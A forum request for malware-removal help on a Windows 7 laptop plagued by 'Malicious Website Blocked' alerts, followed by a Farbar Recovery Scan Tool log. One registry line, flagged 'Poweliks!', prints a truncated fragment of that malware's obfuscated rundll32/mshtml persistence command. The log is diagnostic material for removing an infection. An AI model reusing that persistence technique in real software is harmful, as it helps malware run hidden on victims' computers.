Malicious Website Blocked - dllhost.exe

[adh]

I seem to be infected like everyone else. The Malicious Website Blocked message is popping up every few seconds with different IP addresses listed.  Sometimes it refers to fff5eee.com and the primary process is c:\windows\syswow64\dllhost.exe. It seems to be worse while logged on to one of the user accounts than the other. I have Malwarebytes Premium and have run a full threat scan with rootkits and without and it did not find anything.  Also tried Microsoft Security Scanner with same results. Any help you can give me would be appreciated.

 

I ran the Farbar Recovery Scan Tool and received the following logs.

 

FRST

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 27-10-2014 01
Ran by ADH (administrator) on HEATHMAN-PC on 28-10-2014 22:55:13
Running from C:\Users\ADH.Heathman-PC\Desktop\FRST64
Loaded Profiles: UpdatusUser & ADH (Available profiles: Heathman & UpdatusUser & ADH)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 10
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Nero AG) C:\Program Files (x86)\Motorola Media Link\Lite\NServiceEntry.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe
(Symantec Corporation) C:\Program Files (x86)\PC Checkup\SymcPCCULaunchSvc.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe
(Protexis Inc.) C:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
(Motorola) C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(TomTom) C:\Program Files (x86)\TomTom HOME 2\TomTomHOMEService.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
() C:\Program Files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(TOSHIBA Corporation) C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service\IntuitUpdateService.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TBS\HSON.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\Teco.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\BulletinBoard\TosNcCore.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHWMsg.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe
(TOSHIBA) C:\Program Files (x86)\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe
(TOSHIBA Corporation) C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe
() C:\Windows\Samsung\PanelMgr\SSMMgr.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
() C:\Windows\Samsung\PanelMgr\caller64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
() C:\Program Files\TOSHIBA\FlashCards\Hotkey\TCrdKBB.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\NvXDSync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\widimon\widimon.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Google Inc.) C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe
(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe
(Microsoft Corporation) C:\Windows\System32\MsSpellCheckingFacility.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [590256 2011-05-17] (TOSHIBA Corporation)
HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [296824 2010-09-25] (TOSHIBA Corporation)
HKLM\...\Run: [TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [972672 2011-04-27] (TOSHIBA Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [11775592 2011-01-26] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2188904 2011-01-18] (Realtek Semiconductor)
HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2679592 2011-02-03] (Synaptics Incorporated)
HKLM\...\Run: [ThpSrv] => C:\windows\system32\thpsrv /logon
HKLM\...\Run: [Teco] => C:\Program Files\TOSHIBA\TECO\Teco.exe [1544624 2011-05-24] (TOSHIBA Corporation)
HKLM\...\Run: [intelPAN] => C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe [1935120 2011-06-01] (Intel® Corporation)
HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe [710560 2011-06-09] (TOSHIBA Corporation)
HKLM\...\Run: [TosWaitSrv] => C:\Program Files\TOSHIBA\TPHM\TosWaitSrv.exe [712096 2011-07-01] (TOSHIBA Corporation)
HKLM\...\Run: [TosVolRegulator] => C:\Program Files\TOSHIBA\TosVolRegulator\TosVolRegulator.exe [24376 2009-11-11] (TOSHIBA Corporation)
HKLM\...\Run: [TosNC] => C:\Program Files\Toshiba\BulletinBoard\TosNcCore.exe [597936 2011-07-27] (TOSHIBA Corporation)
HKLM\...\Run: [TosReelTimeMonitor] => C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe [38824 2011-06-28] (TOSHIBA Corporation)
HKLM-x32\...\Run: [sVPWUTIL] => C:\Program Files (x86)\TOSHIBA\Utilities\SVPWUTIL.exe [532480 2010-11-09] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [HWSetup] => C:\Program Files\TOSHIBA\Utilities\HWSetup.exe [423936 2011-03-10] (TOSHIBA Electronics, Inc.)
HKLM-x32\...\Run: [KeNotify] => C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe [34160 2010-08-16] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [TSleepSrv] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe [252792 2010-06-04] (TOSHIBA)
HKLM-x32\...\Run: [ToshibaServiceStation] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe [1298816 2011-07-11] (TOSHIBA Corporation)
HKLM-x32\...\Run: [ToshibaAppPlace] => C:\Program Files (x86)\Toshiba\Toshiba App Place\ToshibaAppPlace.exe [552960 2010-09-23] (Toshiba)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [samsung PanelMgr] => C:\windows\Samsung\PanelMgr\ssmmgr.exe [606208 2009-12-09] ()
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)
Winlogon\Notify\igfxcui: C:\windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-616022151-183045692-1389677156-1014\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2012-03-24] (Google Inc.)
HKU\S-1-5-21-616022151-183045692-1389677156-1014\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
AppInit_DLLs: C:\windows\system32\nvinitx.dll => C:\windows\system32\nvinitx.dll [260416 2012-02-29] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\windows\SysWOW64\nvinit.dll => C:\windows\SysWOW64\nvinit.dll [215360 2012-02-29] (NVIDIA Corporation)
ShellIconOverlayIdentifiers: [OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://start.toshiba.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://start.toshiba.com
SearchScopes: HKLM - DefaultScope {2D1389C8-B7A4-42B3-9385-7287A26C0DF5} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKLM - {2C284C26-5B06-4DFC-B46C-9D2EA294202A} URL = http://search.live.com/results.aspx?q={searchTerms}&FORM=HPNTDF
SearchScopes: HKLM - {2D1389C8-B7A4-42B3-9385-7287A26C0DF5} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKLM - {3F69DA71-DC06-4D09-BEF6-BC86B2EA700C} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM-x32 - DefaultScope {2D1389C8-B7A4-42B3-9385-7287A26C0DF5} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKLM-x32 - {2C284C26-5B06-4DFC-B46C-9D2EA294202A} URL = http://search.live.com/results.aspx?q={searchTerms}&FORM=HPNTDF
SearchScopes: HKLM-x32 - {2D1389C8-B7A4-42B3-9385-7287A26C0DF5} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKLM-x32 - {3F69DA71-DC06-4D09-BEF6-BC86B2EA700C} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKCU - DefaultScope {2D1389C8-B7A4-42B3-9385-7287A26C0DF5} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP_enUS476
SearchScopes: HKCU - {2D1389C8-B7A4-42B3-9385-7287A26C0DF5} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP_enUS476
SearchScopes: HKCU - {3F69DA71-DC06-4D09-BEF6-BC86B2EA700C} URL =
SearchScopes: HKCU - {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = http://nortonsafe.search.ask.com/web?q={SEARCHTERMS}&o=APN10506&l=dis&prt=360&chn=retail&geo=US&ver=21&locale=en_US&gct=kwd&qsrc=2869
SearchScopes: HKCU - {C6375EBC-5C3D-4491-AADA-B48CB13B0238} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\x64\TOSHIBAMediaControllerIE.dll (TOSHIBA Corporation)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
BHO-x32: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll (TOSHIBA Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
DPF: HKLM-x32 {02BCC737-B171-4746-94C9-0D8A0B2C0089} http://office.microsoft.com/sites/production/ieawsdc32.cab
DPF: HKLM-x32 {36299202-09EF-4ABF-ADB9-47C599DBE778} https://www.hpwindows7upgrade.arvato.com/north_america/Endcustomer/HPProdDetect.cab
DPF: HKLM-x32 {49232000-16E4-426C-A231-62846947304B} https://wimpro.cce.hp.com/ChatEntry/downloads/sysinfo.cab
DPF: HKLM-x32 {73ECB3AA-4717-450C-A2AB-D00DAD9EE203} http://h20270.www2.hp.com/ediags/gmn2/install/HPProductDetection2.cab
DPF: HKLM-x32 {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} http://zone.msn.com/bingame/popcaploader_v10.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254

FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin-x32: @java.com/JavaPlugin -> C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll No File
FF Plugin-x32: @nosltd.com/getPlus+®,version=1.6.2.102 -> C:\Program Files (x86)\NOS\bin\np_gp.dll No File
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.6.0.32\IPSFF
FF Extension: Norton Vulnerability Protection - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.6.0.32\IPSFF [2014-10-19]
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.6.0.32\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.6.0.32\coFFPlgn [2014-10-28]

Chrome:
=======
CHR HKLM\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-19]
CHR HKLM-x32\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-19]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)
R2 Motorola Device Manager; C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe [137528 2013-11-15] (Motorola Mobility LLC)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [340240 2011-06-01] ()
R2 N360; C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe [265040 2014-09-21] (Symantec Corporation)
R2 Norton PC Checkup Application Launcher; C:\Program Files (x86)\PC Checkup\SymcPCCULaunchSvc.exe [132056 2012-11-20] (Symantec Corporation)
R2 PCCUJobMgr; C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe [126392 2011-07-19] (Symantec Corporation)
R2 PST Service; C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe [65657 2011-09-02] (Motorola) [File not signed]
R2 Thpsrv; C:\windows\system32\ThpSrv.exe [558592 2011-04-20] (TOSHIBA Corporation) [File not signed]
R2 UDSS; c:\Program Files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe [30064 2011-03-11] ()

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 BHDrvx64; C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\BASHDefs\20141024.001\BHDrvx64.sys [1587416 2014-10-03] (Symantec Corporation)
R1 ccSet_N360; C:\Windows\system32\drivers\N360x64\1506000.020\ccSetx64.sys [162392 2014-02-20] (Symantec Corporation)
S2 DgiVecp; C:\windows\system32\Drivers\DgiVecp.sys [54072 2007-08-12] (Samsung Electronics)
S2 DgiVecp; C:\windows\SysWOW64\Drivers\DgiVecp.sys [41984 2007-08-12] (Samsung Electronics Co., Ltd.) [File not signed]
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [487216 2014-08-26] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [142640 2014-08-26] (Symantec Corporation)
R1 IDSVia64; C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\IPSDefs\20141028.001\IDSvia64.sys [633560 2014-10-17] (Symantec Corporation)
R3 MBAMProtector; C:\windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-10-28] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation)
S3 MREMP50; C:\Program Files (x86)\Common Files\Motive\MREMP50.sys [21248 2012-12-18] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
R3 NAVENG; C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\VirusDefs\20141028.001\ENG64.SYS [129752 2014-08-11] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\VirusDefs\20141028.001\EX64.SYS [2137304 2014-08-11] (Symantec Corporation)
R3 SRTSP; C:\Windows\system32\drivers\N360x64\1506000.020\SRTSP64.SYS [876248 2014-08-25] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\N360x64\1506000.020\SRTSPX64.SYS [37592 2014-08-25] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\drivers\N360x64\1506000.020\SYMDS64.SYS [493656 2014-08-25] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\N360x64\1506000.020\SYMEFA64.SYS [1148120 2014-08-25] (Symantec Corporation)
R3 SymEvent; C:\windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2014-10-19] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\N360x64\1506000.020\Ironx64.SYS [266968 2014-08-06] (Symantec Corporation)
R1 SymNetS; C:\Windows\system32\drivers\N360x64\1506000.020\SYMNETS.SYS [593112 2014-08-25] (Symantec Corporation)
S3 motccgpfl; system32\DRIVERS\motccgpfl.sys [X]
S3 MREMP50a64; \??\C:\PROGRA~1\COMMON~1\Motive\MREMP50a64.SYS [X]
S3 MREMPR5; \??\C:\PROGRA~1\COMMON~1\Motive\MREMPR5.SYS [X]
S3 MRENDIS5; \??\C:\PROGRA~1\COMMON~1\Motive\MRENDIS5.SYS [X]
S3 MRESP50; \??\C:\PROGRA~2\COMMON~1\Motive\MRESP50.SYS [X]
S3 MRESP50a64; \??\C:\PROGRA~1\COMMON~1\Motive\MRESP50a64.SYS [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-28 22:37 - 2014-10-28 22:37 - 00441854 _____ () C:\Users\Heathman\Documents\cc_20141028_223709.reg
2014-10-28 22:33 - 2014-10-28 22:35 - 04974864 _____ (Piriform Ltd) C:\Users\Heathman\Downloads\ccsetup419.exe
